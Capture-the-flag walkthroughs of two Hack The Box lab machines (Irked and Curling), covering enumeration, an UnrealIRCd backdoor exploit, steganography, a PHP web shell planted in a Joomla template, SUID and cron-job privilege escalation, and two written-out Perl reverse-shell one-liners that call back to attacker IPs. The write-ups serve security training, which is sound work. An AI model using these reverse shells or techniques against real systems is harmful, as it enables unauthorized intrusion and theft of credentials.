Hack The Box – Irked


1. Results of Nmap scan

As usual we start with a Nmap scan to find open ports on the target system. The best way to do so is to perform a SYN-Scan (half open scan) on all ports without any version or script detection. After receiving all open ports we start a thorough scan on all open ports with active version scanning (-sV). As figure 1 shows the target system is offering a SSH service on port 22 and  has a http-server on port 80. Furthermore we have Remote-Procedure-Call on port 111 and an IRC-service on a couple different high-ports. Since the machine is named Irked we assume that the IRC-service might be the entry point to get a low privileged shell on the box. But before taking a closer look at the IRC-service we browse the web server on port 80.

2. Content of Webpage
3. List of exploits for UnrealIRCd

When we browse the web server we find an image on the root directory as shown in figure 2. but nothing else that would be of interest. Since we already guessed that the goal might be to compromise the IRC service we take a look at available exploits for UnrealIRC-daemon as shown in figure 3. We see that there is a Metasploit module for backdoor command execution which we give a try. Inside the Metasploit console we set the RHOST to 10.10.10.117 and the RPORT to 6697 which we know from the Nmap scan is one of the ports used by the target. When we run the exploit we are able to execute code on the target. Unfortunately the shell created by the Metasploit exploit gets terminated after a few seconds. Which is why we create a second reverse shell to connect back on port 7777 as soon as Metasploit created an initial shell shown in figure 4.

4. Initial foothold on target system by using Metasploit

 

5. Password for steganography

On the target system we find a home directory for the user djmardov which contains the user flag and a hidden file called .backup. The backup file contains a password and a hint to use it in combination with steganography as shown in figure 5.

Wikipedia: “Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video.”

With the knowledge that the box might have something to do with steganography we take a step back and download the image which we saw on the web server from figure 2 and take a closer look at it. We use a tool called Steghide to extract any hidden data off the image and insert the password which we have found inside the .backup file. By doing so we receive the password for the user djmardov.

6. Hidden password inside the image from the web server.

The next step is to obtain root privileges on the target system. To do so we take a closer look at all binaries with the SUID-bit set and try to find anything unusual. One binary is called viewuser which has no official man page. Furthermore when we try to execute the binary our reverse shell stops working. So we copy the file to our local machine to inspect it further.

-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser

7. Binary viewuser executed locally.
8. Content of /tmp/listuser

When we execute the binary on our local machine we see the following output as shown in figure 7. The most interesting piece of information is the fact, that the program tries to refer to a file called listusers inside the /tmp/ directory. We can use this to our advantage and try to execute arbitrary code by creating a file called listusers and place it inside our local /tmp/ folder. We edit the file with a Shebang to execute a ping command with /bin/sh as shown in figure 8. Afterwards we execute the binary viewuser again and see that the ping command gets executed.

9. Viewuser executes code inside listuser file

The next step is to go back to the target system and place a new file called listuser inside the /tmp/ directory where we place the following reverse shell command:

perl -e ‘use Socket;$i=”10.10.13.183″;$p=7778;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

When we execute the viewuser binary on the target system we receive a reverse connection with root privileges from the target back to our local system as shown in figure 10.

10. Root shell on HTB-Irked

 

 

Hack The Box – Curling

This box retired on 30.03.2019
Goal: CTF – user.txt & root.txt
Difficulty: 4.4 / 10 (rated by HTB-community)

We start with a Nmap scan to see which ports are open. The results show that the box is offering SSH on port 22 and is hosting a web service on port 80.

1. Results of Nmap scan

When we browse the website we see multiple blog posts like the one shown in figure 2.

2. Blog post on Curling-website
3. Joomla-Login on /administrator/index.php

To gather more information about the web service we start Gobuster to enumerate all directories. By doing so we identify a login page to the Joomla Backend on “/administrator/index.php” as shown in figure 3. Since we cannot do much with the already gathered information we need to find anything else of interest. Because we know that the web server is using Joomla we can use a tool called Joomscan which is a vulnerability scanner for Joomla. The scan leads to the following interesting looking directory “http://10.10.10.150/administrator/modules” as shown in figure 4.

4. List of administrator modules

By looking through all listed modules we are not able to identify anything special or of interest. It seems like we somewhere took a wrong turn and landed in a rabbit hole. Because of this we take a step back and start all over again. We know that the machine is rated as easy by the community so we might think too complicated. By redoing all enumeration we take a closer look at the source code of the main page of the web site and find an odd-looking comment shown in figure 5.

5. Hidden comment in source code of Curling-Website.

When we browse the “/secret.txt” directory we find the following string:

Q3VybGluZzIwMTgh

We assume it’s a password and go back to the administrator login page from figure 3 and try some different usernames like admin, administrator and root each with the string from the secrets.txt directory as password. But we won’t get a successful login. We remember that we already found a potential username on the main website from the blog post shown in figure 2. Which is why we try again for username floris and the password Q3VybGluZzIwMTgh but we still get no access.

It obviously has something to do with the secret.txt file so we play around with the string. When decoding the string as base64 we get the result “Curling2018!” which is more likely to be the correct password. /fail

Using Curling2018! and the username floris we get access to the administrator backend. The next step is to upload a PHP reverse shell so that we can execute commands on the system. To do so we search for any existing PHP site and replace the existing code with the code of a web shell. Figure 6 shows the default site error.php and parts of the a PHP web shell from pentestmonkey.net.

6. Replacing PHP-code of error.php site with PHP-code of a reverse shell.

After replacing the code inside the error.php file we browse directory it is located in to access and execute the malicious web shell.

http://10.10.10.150/templates/beez3/error.php

Figure 7 shows that we get a connection as www-data from the target host back to our system on port 9011.

7. Incoming connection from PHP reverse shell

The next step is to get a real shell. To do so we use the following per command to get a reverse connection from the host back to our system on port 9012.

perl -e ‘use Socket;$i=”10.0.13.55″;$p=9012;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

When we take a look inside the home directory of user floris, we see that we need to escalate our privileges from user www-data to user floris to access the user flag as shown in figure 8.

8. Home directory of user floris

Inside the same directory we find an interesting looking file called password_backup. Figure 9 shows the contents for that file which is a hexdump with the header “BZh91AY”.

9. Content of password_backup file.

When we us Google to search for “hexdump BZh91AY” we find a tutorial on how to decode the contents for such a file. As Figure 10 shows we us the commands bzcat to decompresses bzip2 files, zcat to decompress gzip data aswell as tar to open tar archives as shown in figure 10.

10. Decoding the password for user floris

After we have obtained the password we are able to connect to the system with ssh as user floris and read the contents of the first flag inside the floris home directory.

Furthermore we are able to access the directory admin-arena inside the home directory of user floris which we already saw in figure 8. Inside the directory we find two files input and report which we have read and write access to as shown in figure 11.

11. Content of admin-area directory

When we take a look inside the input file we see that it has the following content:

url = “http://127.0.0.1”

Inside the report file we will find a copy of the source code of the Curling-Website that the box is hosting.  It seems like the input file stores a parameter which being used as input to execute Curl as a scheduled task which runs every minute. The results of the execution is then written into the report file.

To test our assumption we create a file, host it on our machine and try to access it by modifying the contents of the input file as shown in figure 12.

echo “Offensive IT” > test.txt

12. Manipulate content of input file to access locally hosted test file

As figure 12 shows we guessed right and after one minute the report file stores the content of our previous created test.txt file.

Since we know that the curl command that runs in the background gets executed with root privileges we try to access the root flag. To do so we need to adjust the parameter inside the input file so that curl will access files on the local system.

url = \”file:///root/root.txt\”

13. Access root flag with curl

Furthermore we are able to obtain the SSH private key for user root as shown in figure 14.

14. Private SSH key for root